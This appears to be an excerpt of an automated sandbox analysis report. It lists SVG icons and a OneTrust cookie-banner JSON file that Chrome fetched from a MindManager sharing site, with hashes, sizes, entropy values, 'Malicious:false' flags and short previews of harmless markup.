                                                                SHA-256:C10B62D417F115E8EDF607C66B6FF335C3774C42906C04974C565C63BC61BE5F
                                                                SHA-512:01C24BA767C980CA1B2CA83BF021BAF760985D8A6EA44F513984E3FC8C42A8F81106E6465985E098C15EE10E80CCCB1503438ACC5BCBAA4004157CB5B4F6D734
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/share-icon.svg
                                                                Preview:<svg width="36" height="36" viewBox="0 0 36 36" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M21.154 13.9861L15.7822 17.1196L15.0264 15.8239L20.3982 12.6904L21.154 13.9861Z" fill="#000B36"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M20.3464 23.4856L14.9248 20.3023L15.6843 19.0088L21.1059 22.1921L20.3464 23.4856Z" fill="#000B36"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M12.5498 20.25C13.7924 20.25 14.7998 19.2426 14.7998 18C14.7998 16.7574 13.7924 15.75 12.5498 15.75C11.3072 15.75 10.2998 16.7574 10.2998 18C10.2998 19.2426 11.3072 20.25 12.5498 20.25ZM12.5498 21.75C14.6209 21.75 16.2998 20.0711 16.2998 18C16.2998 15.9289 14.6209 14.25 12.5498 14.25C10.4787 14.25 8.7998 15.9289 8.7998 18C8.7998 20.0711 10.4787 21.75 12.5498 21.75Z" fill="#000B36"/>.<path fill-rule="evenodd" clip-rule="evenodd" d="M23.4502 14C24.6928 14 25.7002 12.9926 25.7002 11.75C25.7002 10.5074 24.6928 9.5 23.4502 9.5C22.2076 9.5 21.2002 10.5074 21.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1081
                                                                Entropy (8bit):4.99359684383407
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:771C875D46E57AE79986BF30BE0B312E
                                                                SHA1:22EA6392A8DD5B5665ABE26CE57348C59DCD8732
                                                                SHA-256:10F704184A1287335039E450F56EC1B063A5B18EC8ADB0A78FA1A421AFF91BFC
                                                                SHA-512:7521ED991B2BD3EFAD64747B4C89D401B90F4F71D80EFE3A899F86336A7D4E6103D844B563AD0762324DCA8F50274589673E93E03A51A9461CC95F20551F8C30
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PercentageSVG/roPercentageDone06.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:#2a6bac;}.cls-3{fill:#4197ff;}.cls-4{fill:#2979cd;}.cls-5{fill:gray;}</style></defs><title>roPercentageDone06</title><circle class="cls-1" cx="8" cy="8" r="7.5"/><path class="cls-2" d="M8,1A7,7,0,1,1,1,8,7,7,0,0,1,8,1M8,0a8,8,0,1,0,8,8A8,8,0,0,0,8,0Z"/><path class="cls-3" d="M9,15.5a6.23,6.23,0,0,1-4.61-2.09L8.79,8.5H9.5v-8a6.34,6.34,0,0,1,4.19,2.14,8.05,8.05,0,0,1,1.94,6.23A7.21,7.21,0,0,1,10,15.42a7,7,0,0,1-1,.08Z"/><path class="cls-4" d="M10,1.09A5.91,5.91,0,0,1,13.32,3a7.54,7.54,0,0,1,1.82,5.84,6.71,6.71,0,0,1-5.21,6.08A5.84,5.84,0,0,1,9,15a5.67,5.67,0,0,1-3.93-1.61L9,9h1V1.09M9,0V8H8.57L3.72,13.41A6.84,6.84,0,0,0,9,16a6.77,6.77,0,0,0,1.09-.09,7.69,7.69,0,0,0,6-7C16.63,4.1,13.24,0,9,0Z"/><path class="cls-5" d="M-.5,16.5v-4h1V11A1.5,1.5,0,0,1,2,9.5H3A1.5,1.5,0,0,1,4.5,11v1.5h1v4Z"/><path class="cls-1" d="M3,10a1,1,0,0,1,1,1v2H5v3H0V13H1V11a1,1,0,0,1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):485
                                                                Entropy (8bit):5.025791834277627
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:08321E7AEB42F2F2AD92124633605808
                                                                SHA1:E4DE036C8081F0B206B2936B071E44C7FD563638
                                                                SHA-256:68403D1831F69028DB65FF0AF13FDE609080A798D47671F78FE6B9688B7AAC7F
                                                                SHA-512:CF649C35BDF9509EB0F11CDCBD96D3850892DA35733E3C1A5128B060642CCA572CA200D9DA7772648CEE5F64EC54D57BFEF39133B26E1B62631C2B2ACC370EC2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/flag-blue.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#1c97e6;}.cls-2{opacity:0.2;}</style></defs><title>flag_blue_16 copy</title><rect class="cls-1" x="1" width="1" height="16" rx="0.5" ry="0.5"/><polygon class="cls-1" points="8 11 8 4.5 16 7.75 8 11"/><polygon class="cls-1" points="8 8.5 2 10 2 1 8 2.5 8 8.5"/><rect class="cls-2" x="7" y="3" width="1" height="6"/><rect width="1" height="16" rx="0.5" ry="0.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1166
                                                                Entropy (8bit):4.918549562264867
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:C339A141395F709574DA534ABFDD34EE
                                                                SHA1:34F2BEEB5C9956D7E794176D0652287D50612AF8
                                                                SHA-256:708054ADFDEFCB00F5489BD09885E5545EFAF5B84F0BD239614FF7288FAE82CB
                                                                SHA-512:0243FEFED367C36FF287CEB5080226057EAC4F443EE1D5137D64A990BBE05FC3C1BCB75179549BCAC9F43BC7667656AB1ECC294EFBCEF5611717E9E8E9231368
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/site.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 41 40.33">. <defs>. <style>. .cls-1{fill:#fff;}.cls-2{fill:none;stroke:#444;stroke-miterlimit:10;}.cls-3{fill:red;}.cls-4{fill:#a1a2a5;}.cls-5{fill:#d1d2d4;}.cls-6{fill:#444;}. </style>. </defs>. <title>file icon</title>. <g id="Layer_2" data-name="Layer 2">. <g id="Layer_1-2" data-name="Layer 1">. <rect class="cls-2" x="13.5" y="15.83" width="8" height="11" rx="1.67" ry="1.67"/>. <path class="cls-6". d="M27,26.33h-.85C25,26.5,25,26.5,24,25.17V18.5c.5-1.75,1.69-2.83,2.15-2.17H27v-1H25.91a3.78,3.78,0,0,0-2.91,3V25a2.89,2.89,0,0,0,2.91,2.33H27Z"/>. <path class="cls-2". d="M35.5,18.08a1.58,1.58,0,0,1-1.33,1.75H28.83a1.58,1.58,0,0,1-1.33-1.75v-3.5a1.58,1.58,0,0,1,1.33-1.75h5.33a1.58,1.58,0,0,1,1.33,1.75Z"/>. <path class="cls-2". d="M35.5,28.08a1.58,1.58,0,0,1-1.33,1.75H28.83a1.58,1.58,0,0,1-1.33-1.75v
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):2148
                                                                Entropy (8bit):4.2504636691920235
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F7C7D709CD0AB23E3F942DDB05F35E44
                                                                SHA1:238EA4549F74EC99B919684871F9CF210F843435
                                                                SHA-256:D11ACCA93A1ED4835955721AC87B8DC6009FB12390F3DCB40D0C14CD9D10C5C6
                                                                SHA-512:6682FF5B8FC8E93D3926D0B25A6206C0521DC89E342D91BC25DE0EEBAFA05B7AF18A386E6F88C844A4D803CB6CC0698A3B7F4B6565CC27095143B7CB038CFCBB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/remote-services/box.svg
                                                                Preview:<?xml version="1.0" encoding="UTF-8"?>.<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 48 48" version="1.1" width="48px" height="48px">.<g id="surface1">.<path style=" fill:#0288D1;" d="M 25.640625 17.925781 C 22.566406 17.925781 19.816406 19.773438 18.359375 22.464844 C 17.066406 19.773438 14.320313 17.925781 11.082031 17.925781 C 9.308594 17.925781 7.527344 18.589844 6.234375 19.605469 L 6.234375 12.039063 C 6.234375 11.191406 5.421875 10.347656 4.617188 10.347656 C 3.648438 10.347656 3 11.019531 3 12.035156 L 3 26.507813 C 3 31.046875 6.714844 34.921875 11.082031 34.921875 C 14.15625 34.921875 16.90625 33.0625 18.359375 30.367188 C 19.816406 33.058594 22.402344 34.921875 25.640625 34.921875 C 30.167969 34.921875 33.722656 31.046875 33.722656 26.507813 C 33.722656 21.785156 30.167969 17.925781 25.640625 17.925781 M 11.082031 31.554688 C 8.335938 31.554688 6.234375 29.199219 6.234375 26.507813 C 6.234375 23.648438 8.496094 21.449219 11.0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1513
                                                                Entropy (8bit):4.330918287782852
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F8D03ECBCA6E3FD6FE3C7D7E2EFD48A7
                                                                SHA1:18EE71260B4F9C670C9C3634451D88EA4C2FCBD9
                                                                SHA-256:ED696CA86CF08AFA8345E6AB64380206C586A37D91966796070969B8F920ACC9
                                                                SHA-512:589231AA433FE4C17A757241E48DE89568C97D5A362B26CBECEC2B9B0C4FF0F4EAE2A557E49A77692B8C057930DB623C517C682430C5C8A145E6F12F4F2BB49A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/navigation-panel/touch-zoom.svg
                                                                Preview:<svg width="57" height="65" viewBox="0 0 57 65" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="56" height="41" rx="2.5" stroke="#3B51A3"/>.<path d="M50.473 34.75C49.8343 34.75 49.2455 34.9368 48.723 35.25C48.5306 33.0144 46.6317 31.25 44.348 31.25C43.2368 31.25 42.2447 31.6283 41.473 32.3125C40.8527 30.6492 39.2249 29.5 37.348 29.5C36.2158 29.5 35.1884 29.9163 34.4105 30.625L32.973 16.25C32.7238 13.5612 31.2777 12 29.098 12C26.7846 12 25.098 13.8087 25.098 16.375L25.8125 38C25.8309 38.4821 25.9175 39.3199 25.9175 39.3199C25.9175 39.3199 26.375 39.375 24.3125 37.5C22.25 35.625 20.9105 34.3125 20.9105 34.3125C19.2035 32.6072 14.6697 32.5534 12.973 34.25L12.5355 34.6875C12.5128 34.7093 12.4931 34.7255 12.473 34.75C11.8868 35.4587 11.8458 36.2957 12.348 37C12.3681 37.0272 12.3887 37.0381 12.4105 37.0625C12.4752 37.1343 14.0303 38.8698 14.9105 39.75C19.1253 43.9648 26.0557 55.1017 27.7855 63.75C27.8669 64.1595 28.1806 64.5 28.598 64.5H49.598C50.0338 64.5 50.411
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):344
                                                                Entropy (8bit):5.119126781626558
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:3339640BECC06EA5B87B0ED62443A5F0
                                                                SHA1:18A7DD8F77853ADF388A33FA4B077179F901E9B9
                                                                SHA-256:E9F10B216B25382EFBE06811C5CF6FF8B7FAB4018B3104051F64BD6C4B5610D9
                                                                SHA-512:C2BD872642B9B6C679ED9884EFA0AF6AA64A19CCCCE661D4CF710531019AF1CC877A6EA10658088C65E71C2195177AA813C6A23EE4ADADFE7EDB5A479539A0AF
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/arrow-right.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#32d140;}</style></defs><title>thickarrow_right_green_16</title><rect class="cls-1" x="1.5" y="2.5" width="8" height="11" transform="translate(-2.5 13.5) rotate(-90)"/><polygon class="cls-1" points="16 8 8 16 8 0 16 8"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):450
                                                                Entropy (8bit):5.027686290670948
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5EE1311188C038C29490FCFC4953FF44
                                                                SHA1:59AF09F38B608CB6CB11EF0486CAED40EA02BC99
                                                                SHA-256:3DEFFAC42D5DA06858F41E61EE032B6ADCD6E76E00422D75FDD8B0C202F4C41F
                                                                SHA-512:FE7EA320CE10A89A41A610B649C4197BEFCEAB960800ACE44C628A67E6D60DB6E7EA40773E127CC998A04215B832B6E7FA69FBD7B2CA2422066E1657287DABCA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/content-manager/check-button.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 20 15"><defs><style>.cls-1{fill:#3a52a4;}</style></defs><title>check</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M5.31,15a.39.39,0,0,1-.16-.11l-5-5a.5.5,0,0,1,0-.7A.48.48,0,0,1,.5,9a.48.48,0,0,1,.35.15L5.5,13.8,19.15.15a.5.5,0,0,1,.7,0A.48.48,0,0,1,20,.5a.48.48,0,0,1-.15.36l-14,14a.39.39,0,0,1-.16.11.55.55,0,0,1-.38,0Z"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):936
                                                                Entropy (8bit):5.196313157175519
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:48DCDD8A3CE4E8B0588274640557B7F4
                                                                SHA1:8F08B1220A47F1839C4D0D39DA310AFEC19E9FBB
                                                                SHA-256:6C4FC9FCB7CFDE85E0850F210611EFEC7E11711AA2B8E37E0DEFBF1683895B87
                                                                SHA-512:2578C1ABE196F5C3F0AB3EE98D171141998FC8442F48BA4335EC3FDD6630A07BA42110587AC5166A8EF53D2A160E2C81373DC5F2D6AB86057FB91B3DA5A5E5B2
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/note.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#bc7f13;}.cls-3{fill:#9a9aa3;}.cls-4{fill:#fff;}.cls-5{fill:#ccc;}.cls-6{fill:#f03637;}</style></defs><title>note_16</title><path class="cls-1" d="M14,4h2v8.35c.05.17.22.61.05.65H13.93c-.17-.08-.31-.22.07-.39Z"/><rect class="cls-2" x="15" y="4" width="1" height="9"/><polygon class="cls-3" points="16.05 14 14.83 16.43 13.57 14 16.05 14"/><polygon class="cls-4" points="0.5 15.5 0.5 0.5 6.79 0.5 11.5 5.21 11.5 15.5 0.5 15.5"/><path class="cls-3" d="M6.59,1,11,5.41V15H1V1H6.59M7,0H0V16H12V5L7,0Z"/><polygon class="cls-3" points="12 6 7 6 7 1 12 6"/><rect class="cls-5" x="2" y="8" width="7" height="1"/><rect class="cls-5" x="2" y="10" width="7" height="1"/><rect class="cls-5" x="2" y="12" width="7" height="1"/><path class="cls-6" d="M15.89,2H14V4h2V2.74C16.21,2.57,16.06,2.43,15.89,2Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):4026
                                                                Entropy (8bit):4.673782999324871
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:B06CC7088FFA8859FFBB21FC03D3F318
                                                                SHA1:79A4F203067EA9ED52EFA46C17BB32B9127B44DA
                                                                SHA-256:C40D5B19F6A1D19C72DD2E7415E16285104A388A8BD944C7E5C92BB4B5B2788F
                                                                SHA-512:472911BC455E13AF0D3EBF402E6C59623F99FB7C915BDB0C4F3C94BA4ABAAFFFA12904DBF791F9133DBB9966856552C772892CA153D225EA4299A0DCEE78CE9F
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/templates/radialmap.svg
                                                                Preview:<svg width="170" height="90" viewBox="0 0 170 90" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M101.39 50.7608C102.701 51.1228 105.637 49.4576 106.895 39.9009C108.154 30.3442 113.712 27.9551 116.334 27.9551H120.266" stroke="#F5DD49"/>.<path d="M65.6231 50.8064C62.5243 48.4779 61.949 44.4225 61.7488 43.8208C60.1991 39.1638 59.4242 25.9688 50.9008 25.9688C44.0821 25.9688 45.4768 25.9688 47.0265 25.9688" stroke="#F5DD49"/>.<path d="M101.39 50.8047C103.225 51.5557 104.536 49.6781 108.468 60.944C111.614 66.577 116.334 65.8259 120.266 65.4504" stroke="#F5DD49"/>.<rect x="65.623" y="40.8711" width="35.7662" height="18.8766" rx="2" fill="#10227F"/>.<rect x="120.267" y="22.9883" width="23.8442" height="8.94156" rx="4.47078" fill="#F5DD49"/>.<path d="M144.11 27.9551H151.065" stroke="#F5DD49" stroke-width="0.8"/>.<rect x="151.064" y="25.9688" width="9.93507" height="3.97403" fill="#E1E1E1"/>.<rect x="120.267" y="60.7402" width="35.7662" height="8.94156" rx="4.47078" fill="#F5DD49"/>.<
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):639
                                                                Entropy (8bit):5.000483368864415
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:4D6158C0A9C898F2CCEDAF5DDD0BC30D
                                                                SHA1:BC1B1EDD6D06947192E1685F64817DD36DB05426
                                                                SHA-256:BBE988EBE2B004DD7E0EA594D1B144BDBC7B68F34B0B6963E72ED56E2F1B5C48
                                                                SHA-512:401FDCEAF04A04AE4CBDD2FC662D93001BDEFECA4B2D208AB3005BE03F8EFC7CE6B06B6004E08443C1D5087CFD34B7AA4C56118CD9FAF9C03B6EDBA2A1CB66F1
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/euro.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#fff;}</style></defs><title>currency_3_16</title><circle class="cls-1" cx="8" cy="8" r="8"/><path class="cls-2" d="M8.8,4.88a1.93,1.93,0,0,0-1.32.46A5.08,5.08,0,0,0,6.8,7H10V8H6.7l.3.08v.31L6.7,9H9v1H7a1.94,1.94,0,0,0,2.17,1.6A4.8,4.8,0,0,0,11,11.23v1.68a4.46,4.46,0,0,1-2,.39,4.18,4.18,0,0,1-2.73-.87A3.88,3.88,0,0,1,4.93,10H4V9h.72c0-.49,0-.63,0-.8l0-.2H4V7h.82A4.09,4.09,0,0,1,6.13,4.17,3.91,3.91,0,0,1,8.8,3.25a5.11,5.11,0,0,1,2.32.54l-.65,1.53A5,5,0,0,0,9.62,5,2.76,2.76,0,0,0,8.8,4.88Z"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):895
                                                                Entropy (8bit):5.1915520050385044
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5364C4E828625B4F5E9FAC8D2E6ACCD8
                                                                SHA1:706348E656085922DE4FEC9AA6F9C3E8C78DF9FC
                                                                SHA-256:246E6F4DE39F4FFE2B868DFC3F69F2DBA4DA23D1332BE5BAB4FA1444C7014B8E
                                                                SHA-512:76710F3ED9494777FB2B75F5CBC9DB4D076F7703E4F44823D51F4BC29D5B737DCCDFB7049C8C8C82B145E80A1C9D0D478BE41EC8E325982022C107F354023745
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_focus.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:#7db0df;}.cls-4{fill:#4f87c6;}</style></defs><title>context_focus</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><circle class="cls-1" cx="8" cy="8" r="6.5"/><path class="cls-2" d="M8,2A6,6,0,1,1,2,8,6,6,0,0,1,8,2M8,1a7,7,0,1,0,7,7A7,7,0,0,0,8,1Z"/><path class="cls-3" d="M6,8.5a.5.5,0,0,1,0-1h4a.5.5,0,0,1,0,1Z"/><path class="cls-4" d="M10,7H6A1,1,0,0,0,6,9h4a1,1,0,0,0,0-2Z"/><rect class="cls-2" x="6.5" y="0.5" width="3" height="2" rx="0.71" transform="translate(6.5 9.5) rotate(-90)"/><rect class="cls-2" y="7" width="3" height="2" rx="0.71"/><rect class="cls-2" x="13" y="7" width="3" height="2" rx="0.71"/><rect class="cls-2" x="6.5" y="13.5" width="3" height="2" rx="0.71" transform="translate(-6.5 22.5) rotate(-90)"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):675
                                                                Entropy (8bit):5.066404586631786
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:1AAF5403DA508169CEFF20B38CF1BD52
                                                                SHA1:F814B3D87CC5875DB4790C88A2413CC1C633CE15
                                                                SHA-256:C2C8C81BA4EAE668496C246FA7CE1A37D7FBFE5D78521D60433E964C1779ADA9
                                                                SHA-512:71BDF805E6BD54DA5E0C5BD35EA4EDDBFF172ABAD0DA42FD42A0BCEE7BCD5CC7028E1A992DFD3FF49D6AE5D866F3A34D51A5CA30B8C5DDCBF7D1765FA249D691
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/megaphone.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:gray;}.cls-2{fill:#f03637;}.cls-3{fill:#999;}.cls-4{fill:#b3b3b3;}</style></defs><title>megaphone_16</title><rect class="cls-1" x="5.49" y="8" width="1.96" height="8" transform="translate(-2.83 2.03) rotate(-14.66)"/><rect class="cls-2" y="5" width="3" height="4" rx="1.25" ry="1.25"/><ellipse class="cls-3" cx="13.5" cy="7" rx="2.5" ry="3"/><polygon class="cls-4" points="14 11.56 4 9.34 4 4.34 14 1.56 14 11.56"/><rect class="cls-2" x="13" width="2" height="13" rx="1" ry="1"/><rect class="cls-1" x="2" y="4" width="3" height="6" rx="1.5" ry="1.5"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):437
                                                                Entropy (8bit):5.277449677396795
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:15910FF4FAD6E22382975638E27645E2
                                                                SHA1:AABC2ACE7ABEC4A874A24BC133D407F552F08C77
                                                                SHA-256:06268FECCAE9450AF5D215286E55E5326A1E20DEE066BB0352B211C3C496252C
                                                                SHA-512:F73E09116E1B33E02915936F7579DF6130260190A24FBA6107113E16C6CDE8323D2157139D24C0134E5DE2BFB70BFDE2A7E01C14961252B47A46AAC0230709D0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/objects/right-bracket.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 5.25 17"><defs><style>.cls-1{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>background_shape_Asset 79</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><path class="cls-1" d="M.05.5C3.68.86,2,6.55,3.2,7.76a2.12,2.12,0,0,0,1.93.72"/><path class="cls-1" d="M.05,16.5C3.68,16.13,2,10.45,3.2,9.24a2.15,2.15,0,0,1,1.93-.73"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):916
                                                                Entropy (8bit):4.784082704071032
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:DB7501E9721B326F35639227931CB009
                                                                SHA1:B9F1D8CB9B812FA6E37CE4AC3EA26E9261D8A20A
                                                                SHA-256:D209EF1D46D29C08AF633FE82ED1CD8D7EA54435CA3049A38AE7E81248708AF9
                                                                SHA-512:1416275980CC6C62FD2844C3FA7C67909EFAD24AAF63471DEF729AA7F183FE1CB8EBBF0C7E257699FEAF4C548F1F6406765EABF9D3C8F91766551A04EF57FE1A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/IconsSVG/smiley-happy.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#fbb400;}.cls-2{fill:#f88957;}.cls-3{fill:#f9cd75;}.cls-4{fill:#333;}</style></defs><title>emoji_1_16 copy</title><circle class="cls-1" cx="8" cy="8" r="8"/><circle class="cls-2" cx="3" cy="7" r="2"/><circle class="cls-2" cx="13" cy="7" r="2"/><rect class="cls-3" x="5" y="11" width="6" height="2"/><rect class="cls-3" x="11" y="10" width="1" height="2"/><rect class="cls-3" x="4" y="10" width="1" height="2"/><rect class="cls-4" x="5" y="10" width="6" height="2"/><rect class="cls-4" x="11" y="9" width="1" height="2"/><rect class="cls-4" x="4" y="9" width="1" height="2"/><rect class="cls-4" x="4" y="4" width="2" height="3"/><rect class="cls-4" x="10" y="4" width="2" height="3"/><rect class="cls-3" x="4" y="7" width="2" height="1"/><rect class="cls-3" x="10" y="7" width="2" height="1"/></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:JSON data
                                                                Category:dropped
                                                                Size (bytes):13614
                                                                Entropy (8bit):5.21163185311822
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:9B1F8DDF85FB0CBFD926FAACB1FC0405
                                                                SHA1:ADE7F952C70F07FD3497CD3E8656CA1F28C78633
                                                                SHA-256:F4AAA18C55C90588C5E828E56DCC6B2CB0ACF9A4280494C7D1A53FC5E3669112
                                                                SHA-512:E4459B7442F642BAB997BCA930530D2353ED53E24CA0F7D7A6ADED68CF6852693EEDFBC4594FEB4D80BBA779F566BA8918D3462C690F70D277D3E2C155C02280
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:. {. "name": "otFlat",. "html": "PGRpdiBpZD0ib25ldHJ1c3QtYmFubmVyLXNkayIgY2xhc3M9Im90RmxhdCI+PGRpdiByb2xlPSJhbGVydGRpYWxvZyIgYXJpYS1kZXNjcmliZWRieT0ib25ldHJ1c3QtcG9saWN5LXRleHQiPjxkaXYgY2xhc3M9Im90LXNkay1jb250YWluZXIiPjxkaXYgY2xhc3M9Im90LXNkay1yb3ciPjxkaXYgaWQ9Im9uZXRydXN0LWdyb3VwLWNvbnRhaW5lciIgY2xhc3M9Im90LXNkay1laWdodCBvdC1zZGstY29sdW1ucyI+PGRpdiBjbGFzcz0iYmFubmVyX2xvZ28iPjwvZGl2PjxkaXYgaWQ9Im9uZXRydXN0LXBvbGljeSI+PGgyIGlkPSJvbmV0cnVzdC1wb2xpY3ktdGl0bGUiPlRpdGxlPC9oMj48ZGl2IGlkPSJvbmV0cnVzdC1wb2xpY3ktdGV4dCI+dGl0bGU8YSBocmVmPSIjIj5wb2xpY3k8L2E+PC9kaXY+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRhaW5lciI+PGgzIGNsYXNzPSJvdC1kcGQtdGl0bGUiPldlIGNvbGxlY3QgZGF0YSBpbiBvcmRlciB0byBwcm92aWRlOjwvaDM+PGRpdiBjbGFzcz0ib3QtZHBkLWNvbnRlbnQiPjxwIGNsYXNzPSJvdC1kcGQtZGVzYyI+ZGVzY3JpcHRpb248L3A+PC9kaXY+PC9kaXY+PC9kaXY+PC9kaXY+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwLXBhcmVudCIgY2xhc3M9Im90LXNkay10aHJlZSBvdC1zZGstY29sdW1ucyI+PGRpdiBpZD0ib25ldHJ1c3QtYnV0dG9uLWdyb3VwIj48YnV0dG
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):54558
                                                                Entropy (8bit):4.270922573542018
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F5A66482811AF491CEE7B63E145E25AF
                                                                SHA1:8F23D9ACA448DB96A2431D60E4025A2F1E2A00DD
                                                                SHA-256:7C1CAB43377F1C6D6D32F4E449195D5430B3E1F8BD57B900B7711F4845562BD8
                                                                SHA-512:6939980A404864663E6A0AF5C6292293499EC2C0AC18A7E6C44B122C83084B359D79F10520C4027BB07AC6C53B50D41D859B0EFC7C3F36C049CA45819C01CFAE
                                                                Malicious:false
                                                                Reputation:unknown
